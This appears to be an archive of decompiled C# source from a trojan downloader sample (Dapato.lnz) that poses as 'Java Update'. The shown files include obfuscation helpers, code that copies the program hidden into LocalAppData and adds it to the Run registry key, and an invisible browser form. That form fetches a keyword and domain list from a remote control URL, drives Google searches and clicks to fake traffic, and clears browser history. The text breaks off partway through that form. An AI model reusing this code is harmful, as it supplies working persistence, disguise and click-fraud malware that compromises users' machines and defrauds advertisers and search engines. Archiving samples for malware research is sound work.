MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd/SmartAssembly/Attributes/ObfuscateControlFlowAttribute.cs
+15
View File
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.Attributes.ObfuscateControlFlowAttribute
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
using System;
namespace SmartAssembly.Attributes
{
[AttributeUsage(AttributeTargets.Class | AttributeTargets.Struct | AttributeTargets.Constructor | AttributeTargets.Method)]
internal sealed class ObfuscateControlFlowAttribute : Attribute
{
}
}
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd/SmartAssembly/Attributes/PoweredByAttribute.cs
+17
View File
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.Attributes.PoweredByAttribute
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
using System;
namespace SmartAssembly.Attributes
{
public sealed class PoweredByAttribute : Attribute
{
public PoweredByAttribute(string s)
{
}
}
}
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd/SmartAssembly/MemoryManagement/MemoryManager.cs
+71
View File
@@ -0,0 +1,71 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.MemoryManagement.MemoryManager
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace SmartAssembly.MemoryManagement
{
public sealed class MemoryManager
{
private static MemoryManager \u0001;
private long \u0001 = DateTime.Now.Ticks;
[DllImport("kernel32", EntryPoint = "SetProcessWorkingSetSize")]
private static extern int \u0001(
IntPtr process,
int minimumWorkingSetSize,
int maximumWorkingSetSize);
private void \u0001()
{
try
{
using (Process currentProcess = Process.GetCurrentProcess())
MemoryManager.\u0001(currentProcess.Handle, -1, -1);
}
catch
{
}
}
private void \u0001(object sender, EventArgs e)
{
try
{
long ticks = DateTime.Now.Ticks;
if (ticks - this.\u0001 <= 10000000L)
return;
this.\u0001 = ticks;
this.\u0001();
}
catch
{
}
}
private MemoryManager()
{
Application.Idle += new EventHandler(this.\u0001);
this.\u0001();
}
public static void AttachApp()
{
try
{
if (Environment.OSVersion.Platform != PlatformID.Win32NT)
return;
MemoryManager.\u0001 = new MemoryManager();
}
catch
{
}
}
}
}
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd/SmartAssembly/ResourceResolver/ResourceResolver.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.ResourceResolver.ResourceResolver
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
using System;
namespace SmartAssembly.ResourceResolver
{
public sealed class ResourceResolver
{
public static void AttachApp()
{
try
{
\u0001.\u0001.\u0001();
}
catch (Exception ex)
{
}
}
}
}
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd/SmartAssembly/Zip/AESCryptoIndirector.cs
+52
View File
@@ -0,0 +1,52 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.Zip.AESCryptoIndirector
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
using System;
using System.IO;
using System.Reflection;
using System.Security.Cryptography;
namespace SmartAssembly.Zip
{
public sealed class AESCryptoIndirector : IDisposable
{
private readonly Type m_AcspType;
private readonly object m_AESCryptoServiceProvider;
public AESCryptoIndirector()
{
try
{
this.m_AcspType = Assembly.Load("System.Core, Version=2.0.5.0, Culture=neutral, PublicKeyToken=7cec85d7bea7798e").GetType("System.Security.Cryptography.AesManaged");
}
catch (FileNotFoundException ex)
{
this.m_AcspType = Assembly.Load("mscorlib").GetType("System.Security.Cryptography.RijndaelManaged");
}
this.m_AESCryptoServiceProvider = Activator.CreateInstance(this.m_AcspType);
}
public ICryptoTransform GetAESCryptoTransform(
byte[] key,
byte[] iv,
bool decrypt)
{
this.m_AcspType.GetProperty("Key").GetSetMethod().Invoke(this.m_AESCryptoServiceProvider, new object[1]
{
(object) key
});
this.m_AcspType.GetProperty("IV").GetSetMethod().Invoke(this.m_AESCryptoServiceProvider, new object[1]
{
(object) iv
});
return (ICryptoTransform) this.m_AcspType.GetMethod(decrypt ? "CreateDecryptor" : "CreateEncryptor", new Type[0]).Invoke(this.m_AESCryptoServiceProvider, new object[0]);
}
public void Clear() => this.m_AcspType.GetMethod(nameof (Clear)).Invoke(this.m_AESCryptoServiceProvider, new object[0]);
public void Dispose() => this.Clear();
}
}
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd/SmartAssembly/Zip/DESCryptoIndirector.cs
+44
View File
@@ -0,0 +1,44 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.Zip.DESCryptoIndirector
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
using System;
using System.Reflection;
using System.Security.Cryptography;
namespace SmartAssembly.Zip
{
public sealed class DESCryptoIndirector : IDisposable
{
private readonly Type m_DcspType;
private readonly object m_DESCryptoServiceProvider;
public DESCryptoIndirector()
{
this.m_DcspType = Assembly.Load("mscorlib").GetType("System.Security.Cryptography.DESCryptoServiceProvider");
this.m_DESCryptoServiceProvider = Activator.CreateInstance(this.m_DcspType);
}
public ICryptoTransform GetDESCryptoTransform(
byte[] key,
byte[] iv,
bool decrypt)
{
this.m_DcspType.GetProperty("Key").GetSetMethod().Invoke(this.m_DESCryptoServiceProvider, new object[1]
{
(object) key
});
this.m_DcspType.GetProperty("IV").GetSetMethod().Invoke(this.m_DESCryptoServiceProvider, new object[1]
{
(object) iv
});
return (ICryptoTransform) this.m_DcspType.GetMethod(decrypt ? "CreateDecryptor" : "CreateEncryptor", new Type[0]).Invoke(this.m_DESCryptoServiceProvider, new object[0]);
}
public void Clear() => this.m_DcspType.GetMethod(nameof (Clear)).Invoke(this.m_DESCryptoServiceProvider, new object[0]);
public void Dispose() => this.Clear();
}
}
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd/SmartAssembly/Zip/DoNotEncodeStringsAttribute.cs
+15
View File
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.Zip.DoNotEncodeStringsAttribute
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
using System;
namespace SmartAssembly.Zip
{
[AttributeUsage(AttributeTargets.Assembly | AttributeTargets.Module | AttributeTargets.Class | AttributeTargets.Struct | AttributeTargets.Constructor | AttributeTargets.Method)]
public sealed class DoNotEncodeStringsAttribute : Attribute
{
}
}
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd/SmartAssembly/Zip/SimpleZip.cs
+2389
View File
File diff suppressed because it is too large Load Diff
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd/Trojan-Downloader.Win32.Dapato.lnz.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Java Update", "Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.csproj", "{41F7ABC8-AF39-4B04-A6B7-2ED364B63429}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{41F7ABC8-AF39-4B04-A6B7-2ED364B63429}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{41F7ABC8-AF39-4B04-A6B7-2ED364B63429}.Debug|Any CPU.Build.0 = Debug|Any CPU
{41F7ABC8-AF39-4B04-A6B7-2ED364B63429}.Release|Any CPU.ActiveCfg = Release|Any CPU
{41F7ABC8-AF39-4B04-A6B7-2ED364B63429}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd/_0001/_0001.cs
+68
View File
@@ -0,0 +1,68 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
using System;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
namespace \u0001
{
internal sealed class \u0001
{
private static Assembly \u0001 = (Assembly) null;
private static string[] \u0001 = new string[0];
internal static void \u0001()
{
try
{
AppDomain.CurrentDomain.ResourceResolve += new ResolveEventHandler(\u0001.\u0001.\u0001);
}
catch (Exception ex)
{
}
}
private static Assembly \u0001([In] object obj0, [In] ResolveEventArgs obj1)
{
if ((object) \u0001.\u0001.\u0001 == null)
{
lock (\u0001.\u0001.\u0001)
{
\u0001.\u0001.\u0001 = Assembly.Load("{04d269eb-21f0-4313-8865-93f1c1e69e9b}, PublicKeyToken=3e56350693f7355e");
if ((object) \u0001.\u0001.\u0001 != null)
\u0001.\u0001.\u0001 = \u0001.\u0001.\u0001.GetManifestResourceNames();
}
}
string name = obj1.Name;
for (int index = 0; index < \u0001.\u0001.\u0001.Length; ++index)
{
if (\u0001.\u0001.\u0001[index] == name)
return !\u0001.\u0001.\u0001() ? (Assembly) null : \u0001.\u0001.\u0001;
}
return (Assembly) null;
}
private static bool \u0001()
{
try
{
StackFrame[] frames = new StackTrace().GetFrames();
for (int index = 2; index < frames.Length; ++index)
{
if ((object) frames[index].GetMethod().Module.Assembly == (object) Assembly.GetExecutingAssembly())
return true;
}
return false;
}
catch
{
return true;
}
}
}
}
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd/_003CModule_003E.cs
+14
View File
@@ -0,0 +1,14 @@
// Decompiled with JetBrains decompiler
// Type: <Module>
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
internal class \u003CModule\u003E
{
static \u003CModule\u003E()
{
SmartAssembly.AssemblyResolver.AssemblyResolver.AttachApp();
SmartAssembly.ResourceResolver.ResourceResolver.AttachApp();
}
}
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd/_003CPrivateImplementationDetails_003E.cs
+95
View File
@@ -0,0 +1,95 @@
// Decompiled with JetBrains decompiler
// Type: <PrivateImplementationDetails>
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
using System.Runtime.InteropServices;
internal sealed class \u003CPrivateImplementationDetails\u003E
{
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x600000b\u002D1 \u0024\u0024method0x600000b\u002D1;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x600000b\u002D2 \u0024\u0024method0x600000b\u002D2;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x600000b\u002D3 \u0024\u0024method0x600000b\u002D3;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x600000b\u002D4 \u0024\u0024method0x600000b\u002D4;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x600000f\u002D1 \u0024\u0024method0x600000f\u002D1;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x6000015\u002D1 \u0024\u0024method0x6000015\u002D1;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x6000015\u002D2 \u0024\u0024method0x6000015\u002D2;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x6000015\u002D3 \u0024\u0024method0x6000015\u002D3;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x6000015\u002D4 \u0024\u0024method0x6000015\u002D4;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x6000032\u002D1 \u0024\u0024method0x6000032\u002D1;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x6000032\u002D2 \u0024\u0024method0x6000032\u002D2;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x6000032\u002D3 \u0024\u0024method0x6000032\u002D3;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x600003b\u002D1 \u0024\u0024method0x600003b\u002D1;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x600003b\u002D2 \u0024\u0024method0x600003b\u002D2;
[StructLayout(LayoutKind.Explicit, Size = 8, Pack = 1)]
private struct \u0024\u0024struct0x600000b\u002D1
{
}
[StructLayout(LayoutKind.Explicit, Size = 8, Pack = 1)]
private struct \u0024\u0024struct0x600000b\u002D2
{
}
[StructLayout(LayoutKind.Explicit, Size = 16, Pack = 1)]
private struct \u0024\u0024struct0x600000b\u002D3
{
}
[StructLayout(LayoutKind.Explicit, Size = 16, Pack = 1)]
private struct \u0024\u0024struct0x600000b\u002D4
{
}
[StructLayout(LayoutKind.Explicit, Size = 1024, Pack = 1)]
private struct \u0024\u0024struct0x600000f\u002D1
{
}
[StructLayout(LayoutKind.Explicit, Size = 116, Pack = 1)]
private struct \u0024\u0024struct0x6000015\u002D1
{
}
[StructLayout(LayoutKind.Explicit, Size = 116, Pack = 1)]
private struct \u0024\u0024struct0x6000015\u002D2
{
}
[StructLayout(LayoutKind.Explicit, Size = 120, Pack = 1)]
private struct \u0024\u0024struct0x6000015\u002D3
{
}
[StructLayout(LayoutKind.Explicit, Size = 120, Pack = 1)]
private struct \u0024\u0024struct0x6000015\u002D4
{
}
[StructLayout(LayoutKind.Explicit, Size = 12, Pack = 1)]
private struct \u0024\u0024struct0x6000032\u002D1
{
}
[StructLayout(LayoutKind.Explicit, Size = 12, Pack = 1)]
private struct \u0024\u0024struct0x6000032\u002D2
{
}
[StructLayout(LayoutKind.Explicit, Size = 76, Pack = 1)]
private struct \u0024\u0024struct0x6000032\u002D3
{
}
[StructLayout(LayoutKind.Explicit, Size = 76, Pack = 1)]
private struct \u0024\u0024struct0x600003b\u002D1
{
}
[StructLayout(LayoutKind.Explicit, Size = 16, Pack = 1)]
private struct \u0024\u0024struct0x600003b\u002D2
{
}
}
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd/browser_bastan/Araclar.cs
+64
View File
@@ -0,0 +1,64 @@
// Decompiled with JetBrains decompiler
// Type: browser_bastan.Araclar
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
using Microsoft.Win32;
using System;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
namespace browser_bastan
{
public sealed class Araclar
{
private const string RegKey = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run";
private const int FEATURE_DISABLE_NAVIGATION_SOUNDS = 21;
private const int SET_FEATURE_ON_PROCESS = 2;
public static string Regkeyname = "Java Update";
public static string DstName = "JavaUpdate.exe";
[DllImport("urlmon.dll")]
[return: MarshalAs(UnmanagedType.Error)]
private static extern int CoInternetSetFeatureEnabled(
int FeatureEntry,
[MarshalAs(UnmanagedType.U4)] int dwFlags,
bool fEnable);
public static void DisableClickSounds() => Araclar.CoInternetSetFeatureEnabled(21, 2, true);
public static void Copy(string src, string dst)
{
if (File.Exists(dst))
File.SetAttributes(dst, FileAttributes.Normal);
try
{
File.Copy(src, dst, true);
}
catch (Exception ex)
{
}
File.SetAttributes(dst, FileAttributes.Hidden);
}
public static void Startup(string name, string path)
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
if (registryKey == null)
return;
registryKey.SetValue(name, (object) path);
registryKey.Close();
}
public static void DstCheck()
{
string location = Assembly.GetExecutingAssembly().Location;
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData);
if (Path.GetDirectoryName(location) == folderPath)
return;
Araclar.Copy(location, folderPath + "\\" + Araclar.DstName);
}
}
}
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd/browser_bastan/Form1.cs
+380
View File
@@ -0,0 +1,380 @@
// Decompiled with JetBrains decompiler
// Type: browser_bastan.Form1
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.Net;
using System.Runtime.InteropServices;
using System.Text;
using System.Text.RegularExpressions;
using System.Threading;
using System.Windows.Forms;
namespace browser_bastan
{
public sealed class Form1 : Form
{
private const int GWL_EXSTYLE = -20;
private const int WS_EX_TOOLWINDOW = 128;
private const int INTERNET_OPTION_END_BROWSER_SESSION = 42;
private IContainer components;
private WebBrowser webBrowser1;
private string ana = "http://www.nurullahuzmez.com";
private string baba = "http://[DEGISTIR]/v/v.php";
private Queue<KeyValuePair<string, string>> kelimelistesi = new Queue<KeyValuePair<string, string>>();
private string kelime;
private string domain;
private int suankisayfa = 1;
private Dictionary<string, bool> gezilenler = new Dictionary<string, bool>();
private Random rnd = new Random();
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.webBrowser1 = new WebBrowser();
this.SuspendLayout();
this.webBrowser1.Dock = DockStyle.Fill;
this.webBrowser1.IsWebBrowserContextMenuEnabled = false;
this.webBrowser1.Location = new Point(0, 0);
this.webBrowser1.Name = "webBrowser1";
this.webBrowser1.ScriptErrorsSuppressed = true;
this.webBrowser1.Size = new Size(761, 488);
this.webBrowser1.TabIndex = 0;
this.webBrowser1.WebBrowserShortcutsEnabled = false;
this.webBrowser1.DocumentCompleted += new WebBrowserDocumentCompletedEventHandler(this.webBrowser1_DocumentCompleted);
this.webBrowser1.NewWindow += new CancelEventHandler(this.webBrowser1_NewWindow);
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(761, 488);
this.Controls.Add((Control) this.webBrowser1);
this.Name = nameof (Form1);
this.Opacity = 0.0;
this.ShowIcon = false;
this.ShowInTaskbar = false;
this.StartPosition = FormStartPosition.CenterScreen;
this.Load += new EventHandler(this.Form1_Load);
this.ResumeLayout(false);
}
[DllImport("user32.dll")]
public static extern bool SetForegroundWindow(IntPtr hWnd);
[DllImport("user32.dll")]
public static extern int SetWindowLong(IntPtr window, int index, int value);
[DllImport("user32.dll")]
public static extern int GetWindowLong(IntPtr window, int index);
[DllImport("winmm.dll")]
public static extern int sndPlaySound(string lpszSoundName, int uFlags);
[DllImport("wininet.dll", SetLastError = true)]
private static extern bool InternetSetOption(
IntPtr hInternet,
int dwOption,
IntPtr lpBuffer,
int lpdwBufferLength);
public Form1() => this.InitializeComponent();
private void webBrowser1_NewWindow(object sender, CancelEventArgs e) => e.Cancel = true;
private void Basla()
{
this.DeleteCache();
try
{
this.suankisayfa = 1;
KeyValuePair<string, string> keyValuePair = this.kelimelistesi.Dequeue();
this.kelime = keyValuePair.Key;
this.domain = keyValuePair.Value;
while (this.webBrowser1.IsBusy)
Thread.SpinWait(10000);
this.webBrowser1.Navigate("http://www.google.com.tr");
}
catch (InvalidOperationException ex)
{
Environment.Exit(-1);
}
}
private void KelimeleriCek()
{
using (WebClient webClient = new WebClient())
{
string str1 = "";
try
{
str1 = webClient.DownloadString(this.baba);
}
catch (Exception ex)
{
Environment.Exit(-1);
}
string str2 = str1;
char[] chArray = new char[1]{ '\n' };
foreach (string str3 in str2.Split(chArray))
{
string[] strArray = str3.Trim().Split('|');
try
{
string key = strArray[1];
KeyValuePair<string, string> keyValuePair = new KeyValuePair<string, string>(strArray[0], key);
this.gezilenler.Add(key, false);
this.kelimelistesi.Enqueue(keyValuePair);
}
catch
{
}
}
}
}
private void BirineTikla()
{
if (!(this.webBrowser1.Document != (HtmlDocument) null))
return;
foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("input"))
{
if (htmlElement.GetAttribute("name").Contains("btnG") || htmlElement.GetAttribute("name").Contains("btnK"))
{
htmlElement.RaiseEvent("onmouseover");
htmlElement.RaiseEvent("onmousedown");
htmlElement.InvokeMember("click");
}
}
}
private void ButonTikla(string attribute, string value)
{
if (!(this.webBrowser1.Document != (HtmlDocument) null))
return;
foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("input"))
{
if (htmlElement.GetAttribute(attribute).Contains(value))
{
htmlElement.RaiseEvent("onmouseover");
htmlElement.RaiseEvent("onmousedown");
htmlElement.InvokeMember("click");
}
}
}
private void ButonaTekrarTikla(string attribute, string value)
{
if (!(this.webBrowser1.Document != (HtmlDocument) null))
return;
foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("button"))
{
if (htmlElement.GetAttribute(attribute).Contains(value))
{
htmlElement.RaiseEvent("onmouseover");
htmlElement.RaiseEvent("onmousedown");
htmlElement.InvokeMember("click");
}
}
}
private void webBrowser1_DocumentCompleted(
object sender,
WebBrowserDocumentCompletedEventArgs e)
{
string str = e.Url.ToString();
if (str == "http://www.google.com.tr/")
this.SureliIslet((Form1.SureliFonksiyon) (() =>
{
this.TextBoxYaz("name", "q", this.kelime);
this.SureliIslet(new Form1.SureliFonksiyon(this.SubmitForm), 4000, 5000);
}), 2000, 4000);
else if (str.StartsWith("http://www.google.com.tr") && str.Contains("hl=tr"))
{
int suankisayfa = this.suankisayfa;
this.SureliIslet((Form1.SureliFonksiyon) (() =>
{
if (this.LinkeTikla(this.domain))
return;
this.SureliIslet(new Form1.SureliFonksiyon(this.Ilerle), 5000, 12000);
}), 3000, 6000);
}
else
{
if (!str.Contains(this.domain) || str.StartsWith("http://www.google.com"))
return;
this.SureliIslet((Form1.SureliFonksiyon) (() =>
{
if (this.gezilenler[this.domain])
return;
this.gezilenler[this.domain] = true;
this.RastGeleGez();
}), 20000, 50000);
}
}
private void SubmitForm()
{
if (!(this.webBrowser1.Document != (HtmlDocument) null))
return;
foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("Form"))
htmlElement.InvokeMember("submit");
}
private void Ilerle()
{
++this.suankisayfa;
foreach (HtmlElement link in this.webBrowser1.Document.Links)
{
if (link.OuterText == this.suankisayfa.ToString() || link.OuterText == this.suankisayfa.ToString() + " ")
{
link.RaiseEvent("onmouseover");
link.RaiseEvent("onmousedown");
link.InvokeMember("click");
}
}
}
private void RastGeleGez()
{
if (!(this.webBrowser1.Document != (HtmlDocument) null))
return;
HtmlElementCollection elementsByTagName = this.webBrowser1.Document.GetElementsByTagName("a");
List<HtmlElement> htmlElementList = new List<HtmlElement>(elementsByTagName.Count);
if (elementsByTagName.Count > 0)
{
foreach (HtmlElement htmlElement in elementsByTagName)
{
if (htmlElement.GetAttribute("target") != "_blank" && !string.IsNullOrEmpty(htmlElement.InnerText) && this.NormalLink(htmlElement.GetAttribute("href")))
htmlElementList.Add(htmlElement);
}
if (htmlElementList.Count > 0)
{
htmlElementList[this.rnd.Next(htmlElementList.Count - 1)].RaiseEvent("onmouseover");
htmlElementList[this.rnd.Next(htmlElementList.Count - 1)].RaiseEvent("onmousedown");
htmlElementList[this.rnd.Next(htmlElementList.Count - 1)].InvokeMember("click");
htmlElementList.Clear();
}
}
this.SureliIslet((Form1.SureliFonksiyon) (() => this.SureliIslet(new Form1.SureliFonksiyon(this.Basla), 240001, 241000)), 5000, 6000);
}
private bool NormalLink(string url) => !url.EndsWith("xml") && !url.EndsWith("@") && !url.EndsWith("SetHomePage") && !url.EndsWith("AddFavorite") && !url.EndsWith(".jpg") && !url.EndsWith(".gif") && !url.EndsWith(".png") && !url.EndsWith(".rar") && !url.EndsWith(".zip") && !url.EndsWith(".vcf") && !url.EndsWith(".exe") && !url.EndsWith(".mp3") && !url.EndsWith(".mp4") && !url.EndsWith("mailto");
private void DeleteCache()
{
Process.Start(new ProcessStartInfo()
{
FileName = "RunDll32.exe",
Arguments = "InetCpl.cpl,ClearMyTracksByProcess 1"
}).WaitForExit();
Process.Start(new ProcessStartInfo()
{
FileName = "RunDll32.exe",
Arguments = "InetCpl.cpl,ClearMyTracksByProcess 8"
}).WaitForExit();
Form1.InternetSetOption(IntPtr.Zero, 42, IntPtr.Zero, 0);
}
private void TextBoxYaz(string att, string attname, string attvalue)
{
if (!(this.webBrowser1.Document != (HtmlDocument) null))
return;
foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("input"))
{
if (htmlElement.GetAttribute(att).Equals(attname))
htmlElement.SetAttribute("value", attvalue);
}
}
private bool LinkeTikla(string url)
{
bool flag = false;
List<string> stringList = new List<string>();
if (this.webBrowser1.Document != (HtmlDocument) null)
{
foreach (HtmlElement link in this.webBrowser1.Document.Links)
{
string attribute = link.GetAttribute("href");
stringList.Add(attribute);
if (!attribute.Contains("//webcache.googleusercontent.com") && !attribute.Contains("&amp;q=related:") && link.GetAttribute("href").Contains(url))
{
link.RaiseEvent("onmouseover");
link.RaiseEvent("onmousedown");
link.InvokeMember("Click");
flag = true;
break;
}
}
}
